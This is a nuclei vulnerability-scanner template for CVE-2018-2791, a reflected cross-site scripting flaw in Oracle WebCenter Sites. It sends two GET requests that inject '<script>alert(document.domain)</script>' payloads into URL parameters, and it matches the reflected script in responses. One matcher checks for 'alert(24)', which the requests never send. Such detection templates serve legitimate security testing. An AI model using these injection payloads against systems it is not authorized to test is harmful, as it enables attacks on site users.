nuclei-templates/cves/2018/CVE-2018-2791.yaml

id: CVE-2018-2791

info:
  name: Oracle WebCenter Sites Multiple XSS
  author: madrobot,leovalcante
  severity: high
  description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 8.20
    cve-id: CVE-2018-2791
  reference:
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
    - http://www.securitytracker.com/id/1040695
    - http://www.securityfocus.com/bid/103800
    - https://www.exploit-db.com/exploits/44752/
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
  tags: cve,cve2018,oracle,xss,wcs

requests:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{BaseURL}}        

      - |
        GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
        Host: {{BaseURL}}        

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'

      - type: word
        part: body
        words:
          - '<script>alert(24)</script>'
          - 'Missing translation key'
        condition: and